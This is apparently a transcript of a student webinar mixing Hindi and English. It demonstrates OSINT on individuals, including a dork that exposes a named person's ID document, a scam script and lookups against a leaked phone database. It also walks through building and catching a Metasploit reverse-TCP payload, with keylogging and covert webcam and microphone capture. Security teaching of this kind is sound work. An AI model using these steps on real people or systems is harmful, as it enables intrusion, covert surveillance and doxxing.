Good morning, everyone. My name is Pranav Kumar Agrawal, and I welcome you all on SkillForge by CyberSafe. Today, we are here to deep dive into offensive security. When I say offensive security, what's the first thing that comes in your mind? You might wonder someone hacking at 3 a.m., a black hat at his head, and trying to just steal something. But it's not like that. Earlier, I used to think the same. But when I researched and learned, I thought it is a very complex job that hackers do. When I say security, or we can say cyber security, what you all can understand, you can all type in chat box, we have it. Please try to make it interactive session because I am neither a professor nor you are a student, and this is not a class. We are here to learn from peer to peer, and this is the only method by which we can learn in the best way. As in chat is disabled, no problem. So I define cybersecurity as protecting your devices which are connected with electricity. Why so? If you remember in 1980s, we used toaster for a brute force attack. No one can imagine that a toaster can be used for a brute force attack. So that's why cybersecurity is not just limited to protecting your data, but it's also protecting all the devices connected with the electricity. What I feel is. Secondly, great thanks to CyberSafe team because in today 2025, no one is talking about cybersecurity. Everyone is talking about AI, AGI. But if there would be no security, how we can use AI? AI is just not a technology, but it also has its demerits too. For example, we all have witnessed the deepfakes and that AI crimes that are voice cloning crimes that are happening day by day. In newspaper, there is a headline every day that this man was frauded with this amount. If you take the report from January 2025 to September, approx 22,000 crores have been lost from India only. And according to Oxford World Cybercrime Report, we are on the 10th position. It's very alarming situation for us. So that's all. And I am pursuing my BTech in CSE from GLE University, Mathura. I am deeply passionate about learning new things. For example, today I am here delivering a session on OSINT and reversal. You might find me after 6 months delivering a session on AI. So life is just about exploring things. Before starting, many of you can be someone who is starting for the first time. It's no more, not a big deal. I will try to make this session as easy as you can understand it. And even if you are having any doubt, you can check out my LinkedIn and contact me directly. So today's agenda is OSINT and reversal. When I say OSINT, it stands for open source intelligence. Now, open source intelligence, you just divide it into two words. It's made up of two words, open source and intelligence. Open source का मतलब होता है the thing which is available publicly, and intelligence means insight. You are trying to gather the insight about a person or organization using publicly exposed data. For example, how would you wonder that if I take your mobile number and I'll tell all your details? Wouldn't it be crazy? We will do it. So why OSINT? OSINT is not only just limited to investigations or corporate till now. आज के ज़माने में हर स्टूडेंट को, हर इंडिविजुअल को बेसिक OSINT आना चाहिए. इनफैक्ट वी डू इट इन आवर डेली लाइफ, बट हमें पता नहीं है वो OSINT है. Everybody of us use Telegram, isn't it? Everybody of us have somehow used a app called Parivahan, M-Parivahan. It is a type of OSINT tool. We are just entering the number of car or bike and we are getting the details of the owner. It is a OSINT tool. So let's start session. So before starting, how many of you have remember a line from Spider-Man? With great power comes great responsibility. Give me a thumbs up. Who said it? Can you please tell me who said it? Chat is disabled, I think. Can you please open the chat? It would be a great thing. Till the time it's opening, let's have a look on our first tool, which is called Have I Been Found? Let's see how much data is breached today. For example, this is a search engine which tells you how much data is leaked and where it was leaked. Yeah, Aunt May. I don't think so. I am a die-hard Marvel fan. Uncle Ben, Chetan Bahadur got it. So yeah, today I am your Uncle Ben and you are my Peter Parker. So if you are trying to learn things and trick your friend, there is something called Section 66 of Indian IT Act. You should go for it. Otherwise, it will be hard. See, I entered my mail ID and I got one data breach. Okay. Where I got it? It was in both March 2024. The data was compromised, my email address, my name, my mobile number, my physical address. Okay, then what if I change my, I have actually many ID. This is my second one. I got zero data breach. So how many of you remember that in August, we had a news that Royal Enfield changed the ransomware? Or in July, we had a news of 16 billion passwords was leaked. You are, I think, very curious to know. I got to know that my data is leaked on dark web of both. Now what I will do, I will go to Tor, use customized query to download the reports of this code. Then I will see my data. लेकिन ये जितना आसान दिखता है वो है नहीं. Every file download from dark web comes with a ransomware. जितना दिखता है उतना है नहीं, लेकिन ये easy है. You can do it. Then what if I tell you there is something called Google.in? Google.in are reserved keyword for Google. For example, I have typed in title space calculus and file type PDF. What it will give me? It will give me all the result of links which are having title calculus and file type PDF. Why it is used to enhance search or get personalized result in no time. It looks very basic if you think that okay, I will just search. I want to count calculus maths book or file type PDF. But there is something crazy also. There is something index. What I will say, what you will say that if I show this looking crazy, someone's Aadhaar card, some young Phoenix public school, CBSE New Delhi. Certificate of birth certificate. So if I am not wrong, you need only Aadhaar card for buying a SIM. So this is it. This is the state. Photo. I own this person. Sir, your Aadhaar card number is this. Your name is Suresh Chandra Biswal. You are born January 1976. Your gender is 8. Okay. Yeah. Got some packet on your name and I'm from custom. You are delivering this and it contains illegal material. Won't this person be in danger? This is what cyber criminals do. We think that they are hacker, but no, they are just taking. For example, there is one which is called photo forensic. It is also great. I am having this photo. This is of 20. There is something called metadata. Metadata क्या होता है? It is data of data. आपके पास जो डेटा है उसमें से आप क्या डेटा एक्सट्रैक्ट कर सकते हो उसको मेटा डेटा बोलते हैं। मेरे पास ये फोटो थी, इसका फाइल टाइप पता चला, इसका एग्जिट हाइट ऑर्डर पता चला, इमेज विड्थ एंड हाइट पता चला, डेट एंड टाइम, then there comes the crazy part. Here this photo was clicked, I got to know. And it is the exact location. Trust me. It is the exact location. And I mean another photo I say, for example, this. Again we will go to metadata. Then it said, okay, this was the camera and model software media tech का processor है कौन, and again I got location. Well, most data. Again I got the location. It is the part of metadata. Earlier 2023, what I asked everyone that मैंने आपके साथ फोटो खिंचवाई तो सर प्लीज आप ये डॉक ले लीजिए. Why so? If you are sending the photo in doc format, the pixel won't get reduced और आपको ये मेटा डेटा मिल जाता था. But today the things is different. अगर आप व्हाट्सएप पे ये ट्राई करेंगे तो आज के ज़माने में काम नहीं करेगा. Because we have WhatsApp has introduced certain security measures. और इसके साथ स्कैम भी बहुत होता है. Then we have something which is called is check not hide. A reverse search image can which analyze the photos of, for example, if someone is exposed online, वो Instagram या Facebook को बहुत समय से एक्टिव है. For example, although I am not active, but take a subject. For example, this is the famous search from PW. Is brilliant. Then if कभी काम करेगा तो जब आपका लेफ्ट और एक्सपोज now this will run our first. We got और हमें इनसे related person, for example, this is 65% matching. It's like, so we can with the help of this search engine we can identify the person sending his or her image. Is he available online or is he available on XYZ platform? For example, there is something which is called social media OSINT. We are trying to figure out this person is available on other platforms. Cross verification of person across platforms. This is useful in that. And there is something wireless is also there. So I got this APK from a Telegram group where the owner of that group was pretending that if you install this APK, you will get neighbor's Wi-Fi password. आप hack कर लोगे. I said, okay, let's see. When I searched this with the virus total, it tells me it is a spy which spy on your bank SMS. ये आपके सारे SMS OTP चुरा देता है. Android flash SMS it is the command which you share all your OTP to the hacker or scammer. They just impersonate you. They just try to do one technique which is called social engineering. How many of you are aware about it? Please give me a thumbs up. So social engineering is the art of manipulating people. They impersonate you, they fake you to believe them. और अगर आप ये एपी के फॉर्म में डाउनलोड करें सच जो आपका ओएस है वो पढ़ेगा तभी ये बाल भी आ रहा है, ये मैलिशियस है. लेकिन ये जब फिट इन माइंड कि आपको इससे एक बार का वाईफाई पासवर्ड मिल जाएगा. एंड वी आर जस्ट ग्रीडी पीपल्स. See, there are only three, you can say, तीन वजह होती हैं जिससे वजह से साइबर क्राइम होता है. One is fear, one is greed, and another is ignorance. तो अगर ये तीन ह्यूमन साइकोलॉजिकल बिहेवियर को आपने झेलना सीख लिया, रिएक्ट करना सीख लिया, आप कभी साइबर क्राइम के चक्कर में फंस ही नहीं सकते. Then we have something which is called read notify. What read notify do is, for example, I got this mail from my mail ID only. It is my mail ID. It's look legit. For example, this was my mail ID. I sent it to this, but it is showing image in this message are hidden. Message appears suspicious. Why it is? I used when I sent this. I used read notify extension in my mail. What we do is, for example, my Gmail is Agrawal Pranav 087 at gmail.com. I will add dot read notify.com. So what read notify do is, whenever my target subject opens the mail, how many times he opened the mail, at what place he opened the mail, I will get all the information. See, .readnotify.com. But the mail that I got was not like this. It was just showing, wait a minute. It was just showing images are hidden. So read notify, if you will go into deeper into this, read notify just to manipulate your message code and it embed a invisible image in your code. Then there is cybercrime portal of our India, cybercrime.gov.in. It is a best place to check for suspicious images and suspicious phone number. For example, I will go to check suspect option. I have a photo. See, I took this screenshot from LinkedIn. Some person has posted that someone has called him with the Department of Axis Bank, and this was the photo of that website when he opened. It was looking legit, great, but it was a phishing link because of this URL. Now I will search this person number. Nine two one one four four 3255. Filling the captcha. Seven is it is showing found. This number was reported on NCRP portal. So I suggest you that whenever you are getting any link from a known number, the first practice you should adapt is to go on this portal and check for suspicious link. Then we have witnessed that the deepfakes crimes are just on the top. There is something called face on live, voice cloning से लेके AI generated images तक. These are on top. So I have this image. I made it with the help of AI. There is another face on live. Decopy AI. These are excellent tool. कभी कभी फेस ऑन लाइव नहीं चलता है तो यू कैन यूज दिस टूल decopy AI. Now this is analyzing and generating a report. It shows it's 98% probability of AI. It's generated with help of AI. So with the help of this tool, we can just figure out that are we safe or are we on the right track? Someone is not scamming us. It's very easy. For example, a few days back, we got nano banana, which is just amazing. You can't even imagine or you can't even detect the difference between the images it is creating. Is it a real one or AI generated? And last, I have something for you which is called Grabify. Posting tool बहुत सारे हैं लेकिन for daily use, I think these are some best one. I will paste a link here. Now it is generating a link. It is the link. Someone want to volunteer can just click the link. Someone can click the link. So see, we got one is from Nagpur and one is from Imphal. I will tell you what is the ambiguous situation it is making. What I got IP address. Host name means, for example, router or Wi-Fi info. Then what operating system it is. It might be Windows 11 if you are using. Don't be in panic situation that why it is showing Windows 10. Then IP address. Now ये IP address सही नहीं है. This is not the true IP address. If you will go into a browser and there is something which is called ipapi.co, you will find that it's not matching. See, I am sitting in Mathura, but it is showing Dehradun. It is the, you can say, demerits of OSINT. We have discussed a lot of things in past 10-15 minutes. आपको लगा होगा कि ये काफी हेल्प कर रहे हैं इन्वेस्टिगेशन में, बट OSINT report is not admissible in court. It's look crazy, but it's not admissible. For example, can I have some volunteer who are sharing their phone number? I will show you one magic. Please type your phone number in the chat box. I prefer noise. 1 minute, please. Can we take Sachin Lohan? Sachin, can you please unmute yourself? Everyone who are sharing your phone number, please make it sure that you are using this phone number from past 2 to 3 years so that we can get accurate data. Okay. So if you live in Haryana, Hisar,
Yes, yes,
is your someone named Asha Rani related to you?
yes.
So it is the power of OSINT. And let's take another example so that nobody could say you are associated with me. I have bribed you. We have someone, engineer Manoj Kushwa. Sir, do you live in Ghaziabad?
No.
Sir, someone, Raju Yadav related to you?
No.
This is the ambiguous situation that OSINT creates. This is the point I was trying to make. Sir, you can mute yourself.
That's why I was given this number to you.
Yeah. So you can't find the accurate result because it work on the database of leak numbers. For example, I use the database of High Tech Group, which was compromised in 2021. So that's why I said you are please prefer the number you are using from last 2 to 3 years. What tool you are using? See, bro, with great powers come with great responsibility. I don't want like you will get into trouble. The- This is just for educational purpose. There are lots and lots of tool available online, and there are lots of company which are providing these tools, but only for the agencies. I have a bot which I made with help of Python and use some Tor and all. We will have a cup of tea on that. Message me on LinkedIn. And moving ahead, we have something which is called reverse shell. So what is reverse shell? Reverse shell is basically giving access to your system. Someone being a spectator in your own house. This will establish a TCP connection from your victim's machine to the attacker's machine. See, I am just one click away from you and you will make this click. I will not make this click. Let's hack it. I am using Kali Linux for this.
Praveen, if you permit me, can I add something on your OSINT part of mobile number?
Yes, sir, sure.
So, if you want to know the exact name of the person who is using that mobile number, the exact name, if you want to know, so I think today is the bestest way. You can just go to any API, UPI app, and just put that number. You will get the exact correct name which is mentioned in their bank account.
Yes.
So you will get exact information who is the correct person who is using this number, and what is the exact identity of that person.
Thank you, sir. Thanks for letting me know.
Yes,
To be honest, this was a great advice you have given me. I will try it for sure.
yes, yes. Thank
Thank you, sir. Welcome. So we was here. So can you please let me know you are you able to see my this terminal? Okay, great. So firstly, I will know what is my IP address. For that, I have typed ifconfig. Let me start it once again. ifconfig. It will let me know what is my IP address. One thing I would like to share that whatever I am doing is I will be doing on my own system. So please don't try it on someone else's system or on your friend's system because it would be a very tough task for you after the payload is executed and all the things have done. You will face a trouble. Please don't do it. Trust me. Then opening a new terminal, I will change the directory. So these are some basic command of Linux cd, which is change directories. Then I will use Metasploit framework to create a payload. I am typing MSF Venom P Windows x64 meter preter underscore reverse underscore TCP. then this backslash, then L host equals, followed by your IP address. Your IP address means the attacker's IP address. Then L host, you can say anything 1122. Then F, which means file type. Then O. Oh, give me a moment. It happens because sometimes the command is not executed properly. 64 meter reader. TCP backslash n. Then we have L host. What is this? We have L port. Then F exe. Then O devil.exe. Let's take a name devil.exe. So what I have done is I have created a payload using Metasploit framework, which will establish a reverse TCP, reverse transmission control protocol from victim to the attacker. Means victim will give the access कि सर आओ और मेरा system hack कर लो. It's like that. Then for checking if it is available or not, we will type ls. ls is basically to list files. Then again creating a new terminal. For now, in real case scenario, you have to deliver this payload using social engineering attacks or phishing email or compromised website. So as I am trying it on myself, I will use a temporary Python server to host this file. Python 3m. So Python 3, then followed by 8080. I am using this local port. My web page is started. Now I will set up a listener. See, there are 4 or 5 steps to basically hack any system. Using a payload, we first have to know who the target is. Basically, we can say cyber profiling. जासूसी करना. To know what the person is, what is his use case, why he's using internet, how much he's techy about the things. Secondly, to create a payload, we have created it. Thirdly, to set up a listener. You are getting the data where you will access it. And lastly, you have to just execute thing and delete your footprints. Last वाला step मैं नहीं बताऊंगा because I want if you try this, you will surely आप पकड़े जाएं क्योंकि it's not good to hack someone's system without its permission. Now my Metasploit framework is working. Now I'll type use exploit /multi/handler. Now set payload. Set payload. Windows. x64 reader underscore reverse underscore TCP. TCP. यहाँ पे आपको वही नाम देना है जो आपने अपना पेलोड बनाते समय दिया था. What is the issue? Sudo msset forms. It's starting. use there must be some network issue. Give me a moment. Use exploit slash multi slash handler. Use exploit multi slash handler. Set payload Windows slash x64 meter underscore reverse TCP. Let me check it. The payload is set. Now we have to look for options. Now L host we have to set L host here followed by our IP address. Then set L port, which is 1122. Now again options. Now everything is set. Now we have just run it. It will run. Till the now the payload is working. Now I just have to deliver this payload on my attacker system. For the meantime, I have to switch off my security settings. Because it is a malware. Now, as it is hosted on my local PHP server, I will download it from here. It is devil.exe. So I have downloaded it. It is showing that it is malicious. You can also check it through VirusTotal. It will also say that it is malicious. You should run this file. It is also showing that running might put your PC into trouble. तो इतनी सिक्योरिटी सेटिंग्स ऑफ कराने के लिए आपको सोशल इंजीनियरिंग ट्रिक्स का इस्तेमाल करना पड़ेगा. नाउ व्हाट हैपेंड, नथिंग. But here we have established a session. Now the system is compromised. Now to witness its power, you just have sysinfo. I got the info of the system. My desktop name is this, Windows, and what is the domain and English, basically info. Then get UID. I got who is the owner or who is the logged in user. For example, my username is Agrawal. So that it's showing. Then pwd, it's command for listing present directory. Then you can see ls for list file. So it was in my download folder. It will list all the file present in my download folder. It's not limited to this. We can also download the file. See, file is downloaded. Where it is? It is in my home kali ss. See, it is here. Then again, to have some more fun, you'll see key scan underscore start. See, here we have got the report. 58 out of 72 Trojan Metasploit. So that's why I suggested you to please check all the file you are downloading from Google or WhatsApp or somewhere else. Please run it with this virus total. Now I type this hello guys, happy hacking. Now if I say this, it was a keylogger. It captured all your key movements. It is just tip of the iceberg you are witnessing. Then a crazy part. For that I have to turn off my camera. Let me allow this. Hmm. We'll get a snap of ourselves. Webcam_snap. See, I got this photo without letting my user know. I can also record by saying record_mic d/10. And one crazy thing that I like the most about this framework is webcam this. Now nobody will know it is just recording myself. But don't you think it's crazy? Someone is just seeing you 24/7 without letting you know. So this was all I have for today's session, but it is not limited to this. There are many more things which you can explore, which you can learn. Uh, Again, I would like to ask in the chat box. There is one quote that from Avengers. If you are nothing without suit, you don't deserve it. Who said this? And to whom? Can we have answer in chat box? Tony to Peter. Aditya Sharma got it. So, if you are using the tool, for example, today if I'm using AI to create my, you can say, code or to create an app, someday if the news came that AI is no more, we will not be using AI in our organization, and you are given the work that you have to code this. So if you really if you really are a software engineer or a developer, I think you should first learn the code, how to code, how things execute. Then you should move to AI. For example, if tomorrow the news comes that Metasploit framework is no more, it will not be operating on any operating system, I will say okay. We should not learn the tools, how to use the tools. We should learn how to develop these tools. So it's basically my point of view. Can we have some questions, sir? Whatever tools you have mentioned on which browser? Okay, sir. Nitesh Verma. I will surely do that. It was all from my side, and I open up for question, and you can connect me on LinkedIn. I will surely read it. You can share it with me. Yes, bro, I am from Mathura. So that's all was from my side. Also, I would like to mention that, oh, you got my address. Amazing. Let's have a cup of coffee. So I just want to say that uh, I remember a line from former President APJ Abdul Kalam that everybody of us may not have equal talent, but we all have equal opportunity to learn and develop our talent. So these are the type of peer-to-peer session which provide us the opportunity, which provide us the stage to learn. Because in school and colleges, we are learning, but they have their certain limitation and foundation. The professor can't teach us that, see, this is the thing, it is working like this. I am not any professional, I am just a learner. I am in my first year. So the things, I am just exploring things. Life is just about exploring. So I wish you all the very best. And again, if you are having any doubt, you can reach me out.
Yeah, Pranav, thank you so much for this great session. I hope